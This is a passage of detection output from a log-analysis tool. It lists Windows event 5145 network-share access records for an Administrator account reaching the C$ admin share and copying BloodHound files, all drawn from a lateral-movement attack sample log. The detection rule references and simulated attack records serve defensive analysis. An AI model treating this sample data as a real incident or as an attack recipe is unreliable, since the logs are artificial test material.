\??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation 
| IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 